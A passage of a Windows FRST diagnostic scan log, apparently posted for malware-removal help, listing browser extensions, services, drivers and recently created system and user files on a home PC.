CHR Extension: (Google Docs) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2016-01-22]
CHR Extension: (Google Drive) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-22]
CHR Extension: (YouTube) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-22]
CHR Extension: (Google Search) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-22]
CHR Extension: (Bitdefender Wallet) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fabcmochhfpldjekobfaaggijgohadih [2016-01-22]
CHR Extension: (Google Sheets) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-01-22]
CHR Extension: (Google Docs Offline) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-22]
CHR Extension: (Chrome Web Store Payments) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-01-22]
CHR Extension: (Gmail) - C:\Users\sesay\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-01-22]
CHR HKLM-x32\...\Chrome\Extension: [fabcmochhfpldjekobfaaggijgohadih] - hxxps://clients2.google.com/service/update2/crx
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [77104 2015-10-07] (Apple Inc.)
R2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2286848 2015-10-17] (Broadcom Corporation.)
S3 BdDesktopParental; C:\Program Files\Bitdefender\Bitdefender 2015\bdparentalservice.exe [78144 2015-11-11] (Bitdefender)
R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)
R2 ClickToRunSvc; C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [2787512 2015-12-22] (Microsoft Corporation)
R2 GamesAppIntegrationService; C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe [347200 2015-01-15] (WildTangent)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [25800 2015-09-28] (Hewlett-Packard Company)
R2 igfxCUIService2.0.0.0; C:\Windows\system32\igfxCUIService.exe [370064 2015-08-07] (Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [887256 2014-05-13] (Intel® Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [158496 2014-10-10] (Intel Corporation)
S3 lmhosts; C:\Windows\System32\svchost.exe [43944 2015-10-30] (Microsoft Corporation)
S3 lmhosts; C:\WINDOWS\SysWOW64\svchost.exe [37256 2015-10-30] (Microsoft Corporation)
S2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [1133880 2015-06-18] (Malwarebytes Corporation)
R2 NlaSvc; C:\Windows\System32\svchost.exe [43944 2015-10-30] (Microsoft Corporation)
R2 NlaSvc; C:\WINDOWS\SysWOW64\svchost.exe [37256 2015-10-30] (Microsoft Corporation)
R2 nsi; C:\Windows\system32\svchost.exe [43944 2015-10-30] (Microsoft Corporation)
R2 nsi; C:\WINDOWS\SysWOW64\svchost.exe [37256 2015-10-30] (Microsoft Corporation)
R2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [103424 2015-01-30] (Softex Inc.) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [316152 2016-01-15] (Realtek Semiconductor)
R2 UPDATESRV; C:\Program Files\Bitdefender\Bitdefender 2015\updatesrv.exe [100816 2015-11-11] (Bitdefender)
R2 VSSERV; C:\Program Files\Bitdefender\Bitdefender 2015\vsserv.exe [1561344 2015-12-18] (Bitdefender)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
 
===================== Drivers (Whitelisted) ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R0 avc3; C:\Windows\System32\DRIVERS\avc3.sys [1600512 2015-11-11] (BitDefender)
R3 avchv; C:\Windows\system32\DRIVERS\avchv.sys [282000 2015-12-07] (BitDefender)
R3 avckf; C:\Windows\System32\DRIVERS\avckf.sys [775424 2015-11-11] (BitDefender)
R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [208176 2015-10-17] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7533784 2015-02-14] (Broadcom Corporation)
R1 BdfNdisf; C:\Windows\System32\DriverStore\FileRepository\netlwf.inf_amd64_47566fa3371097e5\bdfndisf6.sys [98768 2014-12-15] (BitDefender LLC)
R1 bdfwfpf; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf.sys [115800 2015-12-18] (BitDefender LLC)
S3 bdfwfpf_pc; C:\Program Files\Common Files\Bitdefender\Bitdefender Firewall\bdfwfpf_pc.sys [130656 2015-12-18] (Bitdefender SRL)
R1 BDVEDISK; C:\Windows\system32\DRIVERS\bdvedisk.sys [87912 2015-12-18] (BitDefender)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [91912 2013-11-12] (CyberLink)
R3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-10-19] (Windows ® Win 7 DDK provider)
R3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-10-19] (Windows ® Win 7 DDK provider)
R0 gzflt; C:\Windows\System32\DRIVERS\gzflt.sys [160032 2015-10-01] (BitDefender LLC)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-06-18] (Malwarebytes Corporation)
S3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-06-18] (Malwarebytes Corporation)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [129312 2014-10-10] (Intel Corporation)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R0 trufos; C:\Windows\System32\DRIVERS\trufos.sys [477272 2015-10-01] (BitDefender S.R.L.)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 

==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-27 17:54 - 2016-01-27 17:54 - 00031325 _____ C:\Users\sesay\Desktop\FRST.txt
2016-01-27 17:51 - 2016-01-27 17:54 - 00000000 ____D C:\FRST
2016-01-27 17:49 - 2016-01-27 17:50 - 02370560 _____ (Farbar) C:\Users\sesay\Desktop\FRST64.exe
2016-01-27 12:28 - 2016-01-27 12:26 - 00002030 _____ C:\Users\sesay\Desktop\firewall security.txt
2016-01-27 12:26 - 2016-01-27 12:26 - 00002030 _____ C:\Users\sesay\Documents\firewall security.txt
2016-01-27 11:32 - 2016-01-27 11:32 - 00000000 ____D C:\Users\sesay\AppData\Local\Citrix
2016-01-27 11:22 - 2016-01-27 11:22 - 00000000 ___HD C:\OneDriveTemp
2016-01-26 21:52 - 2016-01-26 21:52 - 00000222 _____ C:\Users\sesay\Desktop\Unturned.url
2016-01-25 21:06 - 2016-01-26 21:22 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Trove
2016-01-25 20:54 - 2016-01-25 20:54 - 00000222 _____ C:\Users\sesay\Desktop\Trove.url
2016-01-25 17:23 - 2011-04-13 14:56 - 00245792 _____ C:\Users\sesay\Downloads\MCSkinEdit.jar
2016-01-24 21:05 - 2016-01-24 21:20 - 186613007 _____ C:\Users\sesay\Desktop\Recording #5.mp4
2016-01-24 18:27 - 2016-01-25 17:25 - 54910420 _____ C:\Users\sesay\Downloads\SkinEdit Alpha 3 pre 7 (1).zip
2016-01-22 16:13 - 2016-01-24 21:29 - 00000000 ____D C:\Users\sesay\Desktop\Cloud Drive
2016-01-22 16:01 - 2016-01-22 16:01 - 00002443 _____ C:\Users\sesay\Desktop\AquaKnight563 - Chrome.lnk
2016-01-22 15:48 - 2016-01-22 15:48 - 00927824 _____ (Google Inc.) C:\Users\sesay\Downloads\ChromeSetup.exe
2016-01-22 15:36 - 2016-01-22 15:55 - 00000000 ___RD C:\Users\sesay\Documents\MEGA
2016-01-22 15:33 - 2016-01-22 15:43 - 00000000 ____D C:\Users\sesay\Documents\MEGAsync Downloads
2016-01-22 15:33 - 2016-01-22 15:33 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MEGAsync
2016-01-22 15:33 - 2016-01-22 15:33 - 00000000 ____D C:\Users\sesay\AppData\Local\Mega Limited
2016-01-22 15:31 - 2016-01-22 15:32 - 10335064 _____ (MEGA Limited) C:\Users\sesay\Downloads\MEGAsyncSetup.exe
2016-01-21 09:24 - 2016-01-21 09:24 - 00000000 ____D C:\Users\sesay\Documents\Curse
2016-01-21 09:21 - 2016-01-25 21:39 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Curse Client
2016-01-21 09:21 - 2016-01-21 09:21 - 00001088 _____ C:\Users\sesay\Desktop\Curse.lnk
2016-01-21 09:21 - 2016-01-21 09:21 - 00001074 _____ C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Curse.lnk
2016-01-21 09:20 - 2016-01-21 09:20 - 51968480 _____ (Curse) C:\Users\sesay\Downloads\CurseClientSetup.exe
2016-01-21 09:20 - 2016-01-21 09:20 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Curse
2016-01-19 19:28 - 2016-01-19 19:28 - 00014155 _____ C:\Users\sesay\Downloads\WORKSHEETCSECTIONCHECKLISTBACKGROUND.pdf
2016-01-15 00:24 - 2016-01-15 00:24 - 10093736 _____ (Intel Corporation) C:\WINDOWS\system32\IntelSSTAPO.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 03319456 _____ (Fortemedia Corporation) C:\WINDOWS\system32\FMAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 02157920 _____ (DTS, Inc.) C:\WINDOWS\system32\sltech64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01624744 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64APO.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01456464 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRRPTR64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01377072 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTCOM64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01348880 _____ (DTS, Inc.) C:\WINDOWS\system32\slcnt64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 01037968 _____ (DTS, Inc.) C:\WINDOWS\system32\sl3apo64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00704696 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtDataProc64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00602984 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SECOMN32.DLL
2016-01-15 00:24 - 2016-01-15 00:24 - 00588632 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAC64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00545816 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00479992 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00399464 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEP64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00393480 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00355496 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtlCPAPI64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00352904 _____ (Synopsys, Inc.) C:\WINDOWS\SysWOW64\SRCOM.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00352904 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00342272 _____ (Waves Audio Ltd.) C:\WINDOWS\system32\MaxxAudioAPO20.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00333288 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DHT64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00333288 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DAA64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00242768 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SFNHK64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00232704 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSH64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00225504 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEED64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00220136 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSHP64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00201000 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFProc64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00176480 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSWOW64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00128512 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAR64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00120720 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEL64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00105720 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFComm64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00103160 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFSAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00102136 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFDAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00102128 _____ (Sonic Focus, Inc.) C:\WINDOWS\system32\SFHAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00100544 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SFCOM64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00097976 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEG64A.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00097912 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SFAPO64.dll
2016-01-15 00:24 - 2016-01-15 00:24 - 00093144 _____ (Virage Logic Corporation / Sonic Focus) C:\WINDOWS\SysWOW64\SFCOM.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 72212512 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoRes64.dat
2016-01-15 00:20 - 2016-01-15 00:20 - 03204352 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtPgEx64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 02902264 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTSnMg64.cpl
2016-01-15 00:20 - 2016-01-15 00:20 - 02058880 _____ (Waves Audio Ltd.) C:\WINDOWS\system32\MaxxAudioEQ64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 02038904 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoInstII64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 01194856 _____ (Intel Corporation) C:\WINDOWS\system32\IntelSstCApoPropPage.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 00267208 _____ (TODO: <Company name>) C:\WINDOWS\system32\slprp64.dll
2016-01-15 00:20 - 2016-01-15 00:20 - 00131016 _____ (Real Sound Lab SIA) C:\WINDOWS\system32\CONEQMSAPOGUILibrary.dll
2016-01-14 19:58 - 2016-01-14 19:58 - 00027740 _____ C:\Users\sesay\Documents\giftbox.3mf
2016-01-13 22:52 - 2016-01-13 22:52 - 00045864 _____ C:\Users\sesay\Downloads\CurrentEvent-AhmadSesay.pdf
2016-01-13 21:39 - 2016-01-04 21:51 - 07477600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-01-13 21:39 - 2016-01-04 21:50 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-01-13 21:39 - 2016-01-04 21:50 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-01-13 21:39 - 2016-01-04 21:50 - 00671472 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
2016-01-13 21:39 - 2016-01-04 21:49 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-01-13 21:39 - 2016-01-04 21:45 - 02587696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2016-01-13 21:39 - 2016-01-04 21:42 - 02026736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 02544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 01299504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00858952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00848160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00785088 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00245840 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2016-01-13 21:39 - 2016-01-04 21:37 - 00234504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mftranscode.dll
2016-01-13 21:39 - 2016-01-04 21:36 - 00808800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-01-13 21:39 - 2016-01-04 21:33 - 02180128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00701384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00652312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00208176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mftranscode.dll
2016-01-13 21:39 - 2016-01-04 21:33 - 00116728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll
2016-01-13 21:39 - 2016-01-04 21:27 - 01594408 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2016-01-13 21:39 - 2016-01-04 21:23 - 01804664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMALFXGFXDSP.dll
2016-01-13 21:39 - 2016-01-04 21:23 - 01309376 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-01-13 21:39 - 2016-01-04 21:23 - 00786696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOD.DLL
2016-01-13 21:39 - 2016-01-04 21:23 - 00119320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MP3DMOD.DLL
2016-01-13 21:39 - 2016-01-04 21:21 - 01371792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2016-01-13 21:39 - 2016-01-04 21:17 - 00695752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOD.DLL
2016-01-13 21:39 - 2016-01-04 21:16 - 00100160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MP3DMOD.DLL
2016-01-13 21:39 - 2016-01-04 20:59 - 22393856 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-01-13 21:39 - 2016-01-04 20:57 - 16986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-01-13 21:39 - 2016-01-04 20:52 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2016-01-13 21:39 - 2016-01-04 20:51 - 00472576 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll
2016-01-13 21:39 - 2016-01-04 20:51 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2016-01-13 21:39 - 2016-01-04 20:50 - 00644096 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll
2016-01-13 21:39 - 2016-01-04 20:49 - 13018624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-01-13 21:39 - 2016-01-04 20:49 - 01582080 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2016-01-13 21:39 - 2016-01-04 20:49 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOE.DLL
2016-01-13 21:39 - 2016-01-04 20:49 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-01-13 21:39 - 2016-01-04 20:49 - 00749056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll
2016-01-13 21:39 - 2016-01-04 20:49 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityCommon.dll
2016-01-13 21:39 - 2016-01-04 20:48 - 01009152 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOD.DLL
2016-01-13 21:39 - 2016-01-04 20:48 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\qdvd.dll
2016-01-13 21:39 - 2016-01-04 20:47 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2016-01-13 21:39 - 2016-01-04 20:47 - 00479232 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2016-01-13 21:39 - 2016-01-04 20:45 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll
2016-01-13 21:39 - 2016-01-04 20:45 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-01-13 21:39 - 2016-01-04 20:43 - 00604672 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-01-13 21:39 - 2016-01-04 20:43 - 00584704 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-01-13 21:39 - 2016-01-04 20:41 - 18677760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-01-13 21:39 - 2016-01-04 20:41 - 01070080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOE.DLL
2016-01-13 21:39 - 2016-01-04 20:41 - 00558592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll
2016-01-13 21:39 - 2016-01-04 20:40 - 00890880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOD.DLL
2016-01-13 21:39 - 2016-01-04 20:40 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ProximityCommon.dll
2016-01-13 21:39 - 2016-01-04 20:39 - 03428864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-01-13 21:39 - 2016-01-04 20:39 - 00569856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qdvd.dll
2016-01-13 21:39 - 2016-01-04 20:39 - 00498176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2016-01-13 21:39 - 2016-01-04 20:38 - 00389120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2016-01-13 21:39 - 2016-01-04 20:36 - 00573440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qedit.dll
2016-01-13 21:39 - 2016-01-04 20:36 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-01-13 21:39 - 2016-01-04 20:33 - 01674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2016-01-13 21:39 - 2016-01-04 20:30 - 02796032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-01-13 21:39 - 2016-01-04 20:29 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-01-13 21:39 - 2016-01-04 20:28 - 07826432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-01-13 21:39 - 2016-01-04 20:28 - 04894720 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-01-13 21:39 - 2016-01-04 20:28 - 01542656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2016-01-13 21:39 - 2016-01-04 20:25 - 05660160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-01-13 21:38 - 2016-01-04 21:51 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-01-13 21:38 - 2016-01-04 21:51 - 01141496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-01-13 21:38 - 2016-01-04 21:48 - 00499432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
2016-01-13 21:38 - 2016-01-04 21:31 - 00703840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-01-13 21:38 - 2016-01-04 21:24 - 00796352 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-01-13 21:38 - 2016-01-04 20:57 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMSRoamingSecurity.dll
2016-01-13 21:38 - 2016-01-04 20:57 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgrcli.dll
2016-01-13 21:38 - 2016-01-04 20:56 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2016-01-13 21:38 - 2016-01-04 20:54 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthLEEnum.sys
2016-01-13 21:38 - 2016-01-04 20:54 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-01-13 21:38 - 2016-01-04 20:53 - 00148992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshom.ocx
2016-01-13 21:38 - 2016-01-04 20:50 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-01-13 21:38 - 2016-01-04 20:50 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-01-13 21:38 - 2016-01-04 20:48 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usermgrcli.dll
2016-01-13 21:38 - 2016-01-04 20:47 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2016-01-13 21:38 - 2016-01-04 20:44 - 00125440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wshom.ocx
2016-01-13 21:38 - 2016-01-04 20:43 - 00953856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2016-01-13 21:38 - 2016-01-04 20:43 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2016-01-13 21:38 - 2016-01-04 20:42 - 00166912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2016-01-13 21:38 - 2016-01-04 20:39 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2016-01-13 21:38 - 2016-01-04 20:30 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-01-13 21:29 - 2016-01-13 21:29 - 00000000 __SHD C:\found.000
